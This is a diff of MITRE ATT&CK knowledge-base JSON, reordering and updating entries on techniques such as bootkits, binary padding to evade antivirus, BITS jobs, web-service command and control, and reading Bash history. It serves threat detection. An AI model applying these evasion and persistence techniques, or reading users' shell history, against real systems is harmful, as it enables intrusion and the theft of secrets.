- "x_mitre_detection": "Monitor scheduled task creation using command-line invocation. Legitimate scheduled tasks may be created during installation of new software or through system administration functions. Look for changes to tasks that do not correlate with known software, patch cycles, etc. \n\nSuspicious program execution through scheduled tasks may show up as outlier processes that have not been seen before when compared against historical data. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.",
- "x_mitre_remote_support": true,
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "Linux"
+ ]
},
{
"external_references": [
@@ -1819,21 +1833,21 @@
],
"modified": "2020-03-24T13:43:40.776Z",
"created": "2019-11-27T13:52:45.853Z",
- "x_mitre_platforms": [
- "Windows"
- ],
- "x_mitre_detection": "Monitor process execution from the svchost.exe in Windows 10 and the Windows Task Scheduler taskeng.exe for older versions of Windows. (Citation: Twitter Leoloobeek Scheduled Task) If scheduled tasks are not used for persistence, then the adversary is likely to remove the task when the action is complete. Monitor Windows Task Scheduler stores in %systemroot%\\System32\\Tasks for change entries related to scheduled tasks that do not correlate with known software, patch cycles, etc.\n\nConfigure event logging for scheduled task creation and changes by enabling the \"Microsoft-Windows-TaskScheduler/Operational\" setting within the event logging service. (Citation: TechNet Forum Scheduled Task Operational Setting) Several events will then be logged on scheduled task activity, including: (Citation: TechNet Scheduled Task Events)(Citation: Microsoft Scheduled Task Events Win10)\n\n* Event ID 106 on Windows 7, Server 2008 R2 - Scheduled task registered\n* Event ID 140 on Windows 7, Server 2008 R2 / 4702 on Windows 10, Server 2016 - Scheduled task updated\n* Event ID 141 on Windows 7, Server 2008 R2 / 4699 on Windows 10, Server 2016 - Scheduled task deleted\n* Event ID 4698 on Windows 10, Server 2016 - Scheduled task created\n* Event ID 4700 on Windows 10, Server 2016 - Scheduled task enabled\n* Event ID 4701 on Windows 10, Server 2016 - Scheduled task disabled\n\nTools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current scheduled tasks. (Citation: TechNet Autoruns)\n\nRemote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. 
Tasks may also be created through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001), so additional logging may need to be configured to gather the appropriate data.",
- "x_mitre_permissions_required": [
- "Administrator"
- ],
- "x_mitre_remote_support": true,
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0",
"x_mitre_data_sources": [
"File monitoring",
"Process command-line parameters",
"Process monitoring",
"Windows event logs"
+ ],
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_remote_support": true,
+ "x_mitre_permissions_required": [
+ "Administrator"
+ ],
+ "x_mitre_detection": "Monitor process execution from the svchost.exe in Windows 10 and the Windows Task Scheduler taskeng.exe for older versions of Windows. (Citation: Twitter Leoloobeek Scheduled Task) If scheduled tasks are not used for persistence, then the adversary is likely to remove the task when the action is complete. Monitor Windows Task Scheduler stores in %systemroot%\\System32\\Tasks for change entries related to scheduled tasks that do not correlate with known software, patch cycles, etc.\n\nConfigure event logging for scheduled task creation and changes by enabling the \"Microsoft-Windows-TaskScheduler/Operational\" setting within the event logging service. (Citation: TechNet Forum Scheduled Task Operational Setting) Several events will then be logged on scheduled task activity, including: (Citation: TechNet Scheduled Task Events)(Citation: Microsoft Scheduled Task Events Win10)\n\n* Event ID 106 on Windows 7, Server 2008 R2 - Scheduled task registered\n* Event ID 140 on Windows 7, Server 2008 R2 / 4702 on Windows 10, Server 2016 - Scheduled task updated\n* Event ID 141 on Windows 7, Server 2008 R2 / 4699 on Windows 10, Server 2016 - Scheduled task deleted\n* Event ID 4698 on Windows 10, Server 2016 - Scheduled task created\n* Event ID 4700 on Windows 10, Server 2016 - Scheduled task enabled\n* Event ID 4701 on Windows 10, Server 2016 - Scheduled task disabled\n\nTools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current scheduled tasks. (Citation: TechNet Autoruns)\n\nRemote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. 
Tasks may also be created through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001), so additional logging may need to be configured to gather the appropriate data.",
+ "x_mitre_platforms": [
+ "Windows"
]
},
{
@@ -1863,23 +1877,24 @@
"phase_name": "collection"
}
],
- "modified": "2019-06-18T13:16:53.385Z",
+ "modified": "2020-07-14T19:42:10.235Z",
"created": "2017-05-31T21:31:34.528Z",
- "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
+ ],
+ "x_mitre_permissions_required": [
+ "User"
+ ],
+ "x_mitre_detection": "Detection of this technique may be difficult due to the various APIs that may be used. Telemetry data regarding API use may not be useful depending on how a system is normally used, but may provide context to other potentially malicious activity occurring on a system.\n\nBehavior that could indicate technique use include an unknown or unusual process accessing APIs associated with devices or software that interact with the microphone, recording devices, or recording software, and a process periodically writing files to disk that contain audio data.",
"x_mitre_data_sources": [
"API monitoring",
"Process monitoring",
"File monitoring"
],
- "x_mitre_detection": "Detection of this technique may be difficult due to the various APIs that may be used. Telemetry data regarding API use may not be useful depending on how a system is normally used, but may provide context to other potentially malicious activity occurring on a system.\n\nBehavior that could indicate technique use include an unknown or unusual process accessing APIs associated with devices or software that interact with the microphone, recording devices, or recording software, and a process periodically writing files to disk that contain audio data.",
- "x_mitre_permissions_required": [
- "User"
- ],
- "x_mitre_platforms": [
- "Linux",
- "macOS",
- "Windows"
- ]
+ "x_mitre_version": "1.0"
},
{
"id": "attack-pattern--52d40641-c480-4ad5-81a3-c80ccaddf82d",
@@ -1954,25 +1969,35 @@
],
"modified": "2020-03-25T15:11:25.821Z",
"created": "2020-01-24T14:54:42.757Z",
- "x_mitre_version": "1.0",
- "x_mitre_is_subtechnique": true,
- "x_mitre_permissions_required": [
- "Administrator"
+ "x_mitre_platforms": [
+ "Windows"
],
- "x_mitre_detection": "Monitor the Registry for changes to the LSA Registry keys. Monitor the LSA process for DLL loads. Windows 8.1 and Windows Server 2012 R2 may generate events when unsigned DLLs try to load into the LSA by setting the Registry key HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\LSASS.exe with AuditLevel = 8. (Citation: Graeber 2014) (Citation: Microsoft Configure LSA)",
"x_mitre_data_sources": [
"DLL monitoring",
"Windows Registry",
"Loaded DLLs"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_detection": "Monitor the Registry for changes to the LSA Registry keys. Monitor the LSA process for DLL loads. Windows 8.1 and Windows Server 2012 R2 may generate events when unsigned DLLs try to load into the LSA by setting the Registry key HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\LSASS.exe with AuditLevel = 8. (Citation: Graeber 2014) (Citation: Microsoft Configure LSA)",
+ "x_mitre_permissions_required": [
+ "Administrator"
+ ],
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_version": "1.0"
},
{
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ "created": "2017-05-31T21:31:27.985Z",
+ "modified": "2020-03-31T22:18:43.019Z",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "collection"
+ }
],
+ "type": "attack-pattern",
+ "id": "attack-pattern--30208d3e-0d6b-43c8-883e-44462a514619",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "name": "Automated Collection",
+ "description": "Once established within a system or network, an adversary may use automated techniques for collecting internal data. Methods for performing this technique could include use of a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) to search for and copy information fitting set criteria such as file type, location, or name at specific time intervals. This functionality could also be built into remote access tools. \n\nThis technique may incorporate use of other techniques such as [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) and [Lateral Tool Transfer](https://attack.mitre.org/techniques/T1570) to identify and move files.",
"external_references": [
{
"source_name": "mitre-attack",
@@ -1980,19 +2005,9 @@
"external_id": "T1119"
}
],
- "description": "Once established within a system or network, an adversary may use automated techniques for collecting internal data. Methods for performing this technique could include use of [Scripting](https://attack.mitre.org/techniques/T1064) to search for and copy information fitting set criteria such as file type, location, or name at specific time intervals. This functionality could also be built into remote access tools. \n\nThis technique may incorporate use of other techniques such as [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) and [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105) to identify and move files.",
- "name": "Automated Collection",
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "id": "attack-pattern--30208d3e-0d6b-43c8-883e-44462a514619",
- "type": "attack-pattern",
- "kill_chain_phases": [
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "collection"
- }
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
- "modified": "2019-07-16T19:44:07.942Z",
- "created": "2017-05-31T21:31:27.985Z",
"x_mitre_system_requirements": [
"Permissions to access directories and files that store information of interest."
],
@@ -2004,13 +2019,14 @@
"x_mitre_permissions_required": [
"User"
],
- "x_mitre_detection": "Depending on the method used, actions could include common file system commands and parameters on the command-line interface within batch files or scripts. A sequence of actions like this may be unusual, depending on the system and network environment. Automated collection may occur along with other techniques such as [Data Staged](https://attack.mitre.org/techniques/T1074). As such, file access monitoring that shows an unusual process performing sequential file opens and potentially copy actions to another location on the file system for many files at once may indicate automated collection behavior. Remote access tools with built-in features may interact directly with the Windows API to gather data. Data may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1086).",
+ "x_mitre_detection": "Depending on the method used, actions could include common file system commands and parameters on the command-line interface within batch files or scripts. A sequence of actions like this may be unusual, depending on the system and network environment. Automated collection may occur along with other techniques such as [Data Staged](https://attack.mitre.org/techniques/T1074). As such, file access monitoring that shows an unusual process performing sequential file opens and potentially copy actions to another location on the file system for many files at once may indicate automated collection behavior. Remote access tools with built-in features may interact directly with the Windows API to gather data. Data may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).",
"x_mitre_data_sources": [
"File monitoring",
"Data loss prevention",
"Process command-line parameters"
],
- "x_mitre_version": "1.0"
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": false
},
{
"id": "attack-pattern--774a3188-6ba9-4dc4-879d-d54ee48a5ce9",
@@ -2036,20 +2052,20 @@
],
"modified": "2020-03-11T13:58:08.219Z",
"created": "2017-05-31T21:30:29.458Z",
- "x_mitre_version": "1.1",
- "x_mitre_data_sources": [
- "File monitoring",
- "Process monitoring",
- "Process use of network"
- ],
- "x_mitre_detection": "Monitor process file access patterns and network behavior. Unrecognized processes or scripts that appear to be traversing file systems and sending network traffic may be suspicious.",
- "x_mitre_network_requirements": true,
+ "x_mitre_is_subtechnique": false,
"x_mitre_platforms": [
"Linux",
"macOS",
"Windows"
],
- "x_mitre_is_subtechnique": false
+ "x_mitre_network_requirements": true,
+ "x_mitre_detection": "Monitor process file access patterns and network behavior. Unrecognized processes or scripts that appear to be traversing file systems and sending network traffic may be suspicious.",
+ "x_mitre_data_sources": [
+ "File monitoring",
+ "Process monitoring",
+ "Process use of network"
+ ],
+ "x_mitre_version": "1.1"
},
{
"id": "attack-pattern--c8e87b83-edbb-48d4-9295-4974897525b7",
@@ -2119,10 +2135,19 @@
],
"modified": "2020-03-25T23:28:10.049Z",
"created": "2018-04-18T17:59:24.739Z",
- "x_mitre_version": "1.1",
- "x_mitre_contributors": [
- "Ricardo Dias",
- "Red Canary"
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_platforms": [
+ "Windows"
+ ],
+ "x_mitre_permissions_required": [
+ "User",
+ "Administrator",
+ "SYSTEM"
+ ],
+ "x_mitre_detection": "BITS runs as a service and its status can be checked with the Sc query utility (sc query bits). (Citation: Microsoft Issues with BITS July 2011) Active BITS tasks can be enumerated using the [BITSAdmin](https://attack.mitre.org/software/S0190) tool (bitsadmin /list /allusers /verbose). (Citation: Microsoft BITS)\n\nMonitor usage of the [BITSAdmin](https://attack.mitre.org/software/S0190) tool (especially the \u2018Transfer\u2019, 'Create', 'AddFile', 'SetNotifyFlags', 'SetNotifyCmdLine', 'SetMinRetryDelay', 'SetCustomHeaders', and 'Resume' command options) (Citation: Microsoft BITS)Admin and the Windows Event log for BITS activity. Also consider investigating more detailed information about jobs by parsing the BITS job database. (Citation: CTU BITS Malware June 2016)\n\nMonitor and analyze network activity generated by BITS. BITS jobs use HTTP(S) and SMB for remote connections and are tethered to the creating user and will only function when that user is logged on (this rule applies even if a user attaches the job to a service account). (Citation: Microsoft BITS)",
+ "x_mitre_defense_bypassed": [
+ "Firewall",
+ "Host forensic analysis"
],
"x_mitre_data_sources": [
"Process monitoring",
@@ -2130,60 +2155,11 @@
"Packet capture",
"Windows event logs"
],
- "x_mitre_defense_bypassed": [
- "Firewall",
- "Host forensic analysis"
+ "x_mitre_contributors": [
+ "Ricardo Dias",
+ "Red Canary"
],
- "x_mitre_detection": "BITS runs as a service and its status can be checked with the Sc query utility (sc query bits). (Citation: Microsoft Issues with BITS July 2011) Active BITS tasks can be enumerated using the [BITSAdmin](https://attack.mitre.org/software/S0190) tool (bitsadmin /list /allusers /verbose). (Citation: Microsoft BITS)\n\nMonitor usage of the [BITSAdmin](https://attack.mitre.org/software/S0190) tool (especially the \u2018Transfer\u2019, 'Create', 'AddFile', 'SetNotifyFlags', 'SetNotifyCmdLine', 'SetMinRetryDelay', 'SetCustomHeaders', and 'Resume' command options) (Citation: Microsoft BITS)Admin and the Windows Event log for BITS activity. Also consider investigating more detailed information about jobs by parsing the BITS job database. (Citation: CTU BITS Malware June 2016)\n\nMonitor and analyze network activity generated by BITS. BITS jobs use HTTP(S) and SMB for remote connections and are tethered to the creating user and will only function when that user is logged on (this rule applies even if a user attaches the job to a service account). (Citation: Microsoft BITS)",
- "x_mitre_permissions_required": [
- "User",
- "Administrator",
- "SYSTEM"
- ],
- "x_mitre_platforms": [
- "Windows"
- ],
- "x_mitre_is_subtechnique": false
- },
- {
- "external_references": [
- {
- "source_name": "mitre-attack",
- "external_id": "T1059.004",
- "url": "https://attack.mitre.org/techniques/T1059/004"
- }
- ],
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "name": "Bash",
- "description": "Adversaries may abuse Bash commands and scripts for execution. Bash, the primary macOS (through Mojave) and Linux shell, can control every aspect of a system, with certain commands requiring elevated privileges. \n\nBash scripts (.sh) provide the shell with a list of sequential commands to run, as well as normal scripting operations such as conditionals and loops. Common uses of Bash scripts include long or repetitive tasks, or the need to run the same set of commands on multiple systems.",
- "id": "attack-pattern--a9d4b653-6915-42af-98b2-5758c4ceee56",
- "type": "attack-pattern",
- "kill_chain_phases": [
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "execution"
- }
- ],
- "modified": "2020-03-28T17:06:19.681Z",
- "created": "2020-03-09T14:15:05.330Z",
- "x_mitre_platforms": [
- "macOS",
- "Linux"
- ],
- "x_mitre_data_sources": [
- "Process monitoring",
- "Process command-line parameters"
- ],
- "x_mitre_detection": "Bash usage may be common on administrator, developer, or power user systems, depending on job function. If scripting is restricted for normal users, then any attempt to enable scripts running on a system would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.\n\nScripts are likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. Monitor processes and command-line arguments for script execution and subsequent behavior. Actions may be related to network and system information Discovery, Collection, or other scriptable post-compromise behaviors and could be used as indicators of detection leading back to the source script. ",
- "x_mitre_permissions_required": [
- "User",
- "root"
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_version": "1.1"
},
{
"external_references": [
@@ -2234,23 +2210,39 @@
],
"modified": "2020-02-07T20:48:49.878Z",
"created": "2020-02-04T13:02:11.685Z",
- "x_mitre_platforms": [
- "Linux",
- "macOS"
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_permissions_required": [
+ "User"
],
+ "x_mitre_detection": "Monitoring when the user's .bash_history is read can help alert to suspicious activity. While users do typically rely on their history of commands, they often access this history through other utilities like \"history\" instead of commands like cat ~/.bash_history.",
"x_mitre_data_sources": [
"Process command-line parameters",
"Process monitoring",
"File monitoring"
],
- "x_mitre_detection": "Monitoring when the user's .bash_history is read can help alert to suspicious activity. While users do typically rely on their history of commands, they often access this history through other utilities like \"history\" instead of commands like cat ~/.bash_history.",
- "x_mitre_permissions_required": [
- "User"
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS"
+ ]
},
{
+ "created": "2020-03-14T22:34:03.024Z",
+ "modified": "2020-03-26T23:15:47.861Z",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "command-and-control"
+ }
+ ],
+ "type": "attack-pattern",
+ "id": "attack-pattern--be055942-6e63-49d7-9fa1-9cb7d8a8f3f4",
+ "description": "Adversaries may use an existing, legitimate external Web service as a means for sending commands to and receiving output from a compromised system over the Web service channel. Compromised systems may leverage popular websites and social media to host command and control (C2) instructions. Those infected systems can then send the output from those commands back over that Web service channel. The return traffic may occur in a variety of ways, depending on the Web service being utilized. For example, the return traffic may take the form of the compromised system posting a comment on a forum, issuing a pull request to development project, updating a document hosted on a Web service, or by sending a Tweet. \n\nPopular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection. ",
+ "name": "Bidirectional Communication",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
"external_references": [
{
"source_name": "mitre-attack",
@@ -2263,22 +2255,6 @@
"source_name": "University of Birmingham C2"
}
],
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "name": "Bidirectional Communication",
- "description": "Adversaries may use an existing, legitimate external Web service as a means for sending commands to and receiving output from a compromised system over the Web service channel. Compromised systems may leverage popular websites and social media to host command and control (C2) instructions. Those infected systems can then send the output from those commands back over that Web service channel. The return traffic may occur in a variety of ways, depending on the Web service being utilized. For example, the return traffic may take the form of the compromised system posting a comment on a forum, issuing a pull request to development project, updating a document hosted on a Web service, or by sending a Tweet. \n\nPopular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection. ",
- "id": "attack-pattern--be055942-6e63-49d7-9fa1-9cb7d8a8f3f4",
- "type": "attack-pattern",
- "kill_chain_phases": [
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "command-and-control"
- }
- ],
- "modified": "2020-03-26T23:15:47.861Z",
- "created": "2020-03-14T22:34:03.024Z",
"x_mitre_platforms": [
"Linux",
"macOS",
@@ -2334,13 +2310,6 @@
"created": "2017-05-31T21:30:22.096Z"
},
{
- "id": "attack-pattern--5bfccc3f-2326-4112-86cc-c1ece9d8a2b5",
- "description": "Adversaries may use binary padding to add junk data and change the on-disk representation of malware. This can be done without affecting the functionality or behavior of a binary, but can increase the size of the binary beyond what some security tools are capable of handling due to file size limitations. \n\nBinary padding effectively changes the checksum of the file and can also be used to avoid hash-based blacklists and static anti-virus signatures.(Citation: ESET OceanLotus) The padding used is commonly generated by a function to create junk data and then appended to the end or applied to sections of malware.(Citation: Securelist Malware Tricks April 2017) Increasing the file size may decrease the effectiveness of certain tools and detection capabilities that are not designed or configured to scan large files. This may also reduce the likelihood of being collected for analysis. Public file scanning services, such as VirusTotal, limits the maximum size of an uploaded file to be analyzed.(Citation: VirusTotal FAQ) ",
- "name": "Binary Padding",
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
"external_references": [
{
"source_name": "mitre-attack",
@@ -2368,6 +2337,13 @@
"description": "VirusTotal. (n.d.). VirusTotal FAQ. Retrieved May 23, 2019."
}
],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "name": "Binary Padding",
+ "description": "Adversaries may use binary padding to add junk data and change the on-disk representation of malware. This can be done without affecting the functionality or behavior of a binary, but can increase the size of the binary beyond what some security tools are capable of handling due to file size limitations. \n\nBinary padding effectively changes the checksum of the file and can also be used to avoid hash-based blocklists and static anti-virus signatures.(Citation: ESET OceanLotus) The padding used is commonly generated by a function to create junk data and then appended to the end or applied to sections of malware.(Citation: Securelist Malware Tricks April 2017) Increasing the file size may decrease the effectiveness of certain tools and detection capabilities that are not designed or configured to scan large files. This may also reduce the likelihood of being collected for analysis. Public file scanning services, such as VirusTotal, limits the maximum size of an uploaded file to be analyzed.(Citation: VirusTotal FAQ) ",
+ "id": "attack-pattern--5bfccc3f-2326-4112-86cc-c1ece9d8a2b5",
"type": "attack-pattern",
"kill_chain_phases": [
{
@@ -2375,7 +2351,7 @@
"phase_name": "defense-evasion"
}
],
- "modified": "2020-03-29T20:49:04.050Z",
+ "modified": "2020-06-20T20:50:48.023Z",
"created": "2020-02-05T14:04:25.865Z",
"x_mitre_contributors": [
"Martin Jirkal, ESET"
@@ -2455,21 +2431,21 @@
"phase_name": "privilege-escalation"
}
],
- "modified": "2020-03-25T19:47:43.546Z",
+ "modified": "2020-06-30T21:23:15.683Z",
"created": "2020-01-23T17:46:59.535Z",
- "x_mitre_platforms": [
- "Linux",
- "macOS",
- "Windows"
- ],
- "x_mitre_detection": "Monitor for additions or modifications of mechanisms that could be used to trigger autostart execution, such as relevant additions to the Registry. Look for changes that are not correlated with known updates, patches, or other planned administrative activity. Tools such as Sysinternals Autoruns may also be used to detect system autostart configuration changes that could be attempts at persistence.(Citation: TechNet Autoruns) Changes to some autostart configuration settings may happen under normal conditions when legitimate software is installed. \n\nSuspicious program execution as autostart programs may show up as outlier processes that have not been seen before when compared against historical data.To increase confidence of malicious activity, data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.\n\nMonitor DLL loads by processes, specifically looking for DLLs that are not recognized or not normally loaded into a process. Look for abnormal process behavior that may be due to a process loading a malicious DLL.\n\nMonitor for abnormal usage of utilities and command-line parameters involved in kernel modification or driver installation.",
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": false,
"x_mitre_permissions_required": [
"User",
"Administrator",
"root"
],
- "x_mitre_is_subtechnique": false,
- "x_mitre_version": "1.0"
+ "x_mitre_detection": "Monitor for additions or modifications of mechanisms that could be used to trigger autostart execution, such as relevant additions to the Registry. Look for changes that are not correlated with known updates, patches, or other planned administrative activity. Tools such as Sysinternals Autoruns may also be used to detect system autostart configuration changes that could be attempts at persistence.(Citation: TechNet Autoruns) Changes to some autostart configuration settings may happen under normal conditions when legitimate software is installed. \n\nSuspicious program execution as autostart programs may show up as outlier processes that have not been seen before when compared against historical data.To increase confidence of malicious activity, data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.\n\nMonitor DLL loads by processes, specifically looking for DLLs that are not recognized or not normally loaded into a process. Look for abnormal process behavior that may be due to a process loading a malicious DLL.\n\nMonitor for abnormal usage of utilities and command-line parameters involved in kernel modification or driver installation.",
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
+ ]
},
{
"id": "attack-pattern--03259939-0b57-482f-8eb5-87c0e0d54334",
@@ -2504,17 +2480,17 @@
],
"modified": "2020-03-27T16:49:15.953Z",
"created": "2017-05-31T21:30:38.910Z",
- "x_mitre_version": "2.0",
- "x_mitre_data_sources": [
- "File monitoring",
- "Process monitoring"
- ],
- "x_mitre_detection": "Monitor logon scripts for unusual access by abnormal users or at abnormal times. Look for files added or modified by unusual accounts outside of normal administration duties. Monitor running process for actions that could be indicative of abnormal programs or executables running upon logon.",
+ "x_mitre_is_subtechnique": false,
"x_mitre_platforms": [
"macOS",
"Windows"
],
- "x_mitre_is_subtechnique": false
+ "x_mitre_detection": "Monitor logon scripts for unusual access by abnormal users or at abnormal times. Look for files added or modified by unusual accounts outside of normal administration duties. Monitor running process for actions that could be indicative of abnormal programs or executables running upon logon.",
+ "x_mitre_data_sources": [
+ "File monitoring",
+ "Process monitoring"
+ ],
+ "x_mitre_version": "2.0"
},
{
"id": "attack-pattern--02fefddc-fb1b-423f-a76b-7552dd211d4d",
@@ -2549,9 +2525,9 @@
"url": "https://attack.mitre.org/techniques/T1542/003"
},
{
- "url": "https://www.fireeye.com/content/dam/fireeye-www/regional/fr_FR/offers/pdfs/ig-mtrends-2016.pdf",
- "description": "Mandiant. (2016, February). M-Trends 2016. Retrieved January 4, 2017.",
- "source_name": "MTrends 2016"
+ "source_name": "Mandiant M Trends 2016",
+ "url": "https://www.fireeye.com/content/dam/fireeye-www/current-threats/pdfs/rpt-mtrends-2016.pdf",
+ "description": "Mandiant. (2016, February 25). Mandiant M-Trends 2016. Retrieved March 5, 2019."
},
{
"url": "http://www.symantec.com/connect/blogs/are-mbr-infections-back-fashion",
@@ -2564,7 +2540,7 @@
],
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"name": "Bootkit",
- "description": "Adversaries may use bootkits to persist on systems. Bootkits reside at a layer below the operating system and may make it difficult to perform full remediation unless an organization suspects one was used and can act accordingly.\n\nA bootkit is a malware variant that modifies the boot sectors of a hard drive, including the Master Boot Record (MBR) and Volume Boot Record (VBR). (Citation: MTrends 2016) The MBR is the section of disk that is first loaded after completing hardware initialization by the BIOS. It is the location of the boot loader. An adversary who has raw access to the boot drive may overwrite this area, diverting execution during startup from the normal boot loader to adversary code. (Citation: Lau 2011)\n\nThe MBR passes control of the boot process to the VBR. Similar to the case of MBR, an adversary who has raw access to the boot drive may overwrite the VBR to divert execution during startup to adversary code.",
+ "description": "Adversaries may use bootkits to persist on systems. Bootkits reside at a layer below the operating system and may make it difficult to perform full remediation unless an organization suspects one was used and can act accordingly.\n\nA bootkit is a malware variant that modifies the boot sectors of a hard drive, including the Master Boot Record (MBR) and Volume Boot Record (VBR). (Citation: Mandiant M Trends 2016) The MBR is the section of disk that is first loaded after completing hardware initialization by the BIOS. It is the location of the boot loader. An adversary who has raw access to the boot drive may overwrite this area, diverting execution during startup from the normal boot loader to adversary code. (Citation: Lau 2011)\n\nThe MBR passes control of the boot process to the VBR. Similar to the case of MBR, an adversary who has raw access to the boot drive may overwrite the VBR to divert execution during startup to adversary code.",
"id": "attack-pattern--1b7b1806-7746-41a1-a35d-e48dae25ddba",
"type": "attack-pattern",
"kill_chain_phases": [
@@ -2577,28 +2553,28 @@
"phase_name": "defense-evasion"
}
],
- "modified": "2020-03-23T23:43:32.353Z",
+ "modified": "2020-05-07T22:32:05.335Z",
"created": "2019-12-19T21:05:38.123Z",
- "x_mitre_platforms": [
- "Linux",
- "Windows"
+ "x_mitre_defense_bypassed": [
+ "Host intrusion prevention systems",
+ "Anti-virus",
+ "File monitoring"
],
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_permissions_required": [
+ "Administrator",
+ "SYSTEM"
+ ],
+ "x_mitre_detection": "Perform integrity checking on MBR and VBR. Take snapshots of MBR and VBR and compare against known good samples. Report changes to MBR and VBR as they occur for indicators of suspicious activity and further analysis.",
"x_mitre_data_sources": [
"VBR",
"MBR",
"API monitoring"
],
- "x_mitre_detection": "Perform integrity checking on MBR and VBR. Take snapshots of MBR and VBR and compare against known good samples. Report changes to MBR and VBR as they occur for indicators of suspicious activity and further analysis.",
- "x_mitre_permissions_required": [
- "Administrator",
- "SYSTEM"
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0",
- "x_mitre_defense_bypassed": [
- "Host intrusion prevention systems",
- "Anti-virus",
- "File monitoring"
+ "x_mitre_platforms": [
+ "Linux",
+ "Windows"
]
},
{
@@ -2625,26 +2601,26 @@
],
"modified": "2020-03-26T16:06:07.367Z",
"created": "2018-04-18T17:59:24.739Z",
- "x_mitre_version": "1.0",
- "x_mitre_contributors": [
- "Mike Kemmerer"
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_platforms": [
+ "Linux",
+ "Windows",
+ "macOS"
],
+ "x_mitre_permissions_required": [
+ "User"
+ ],
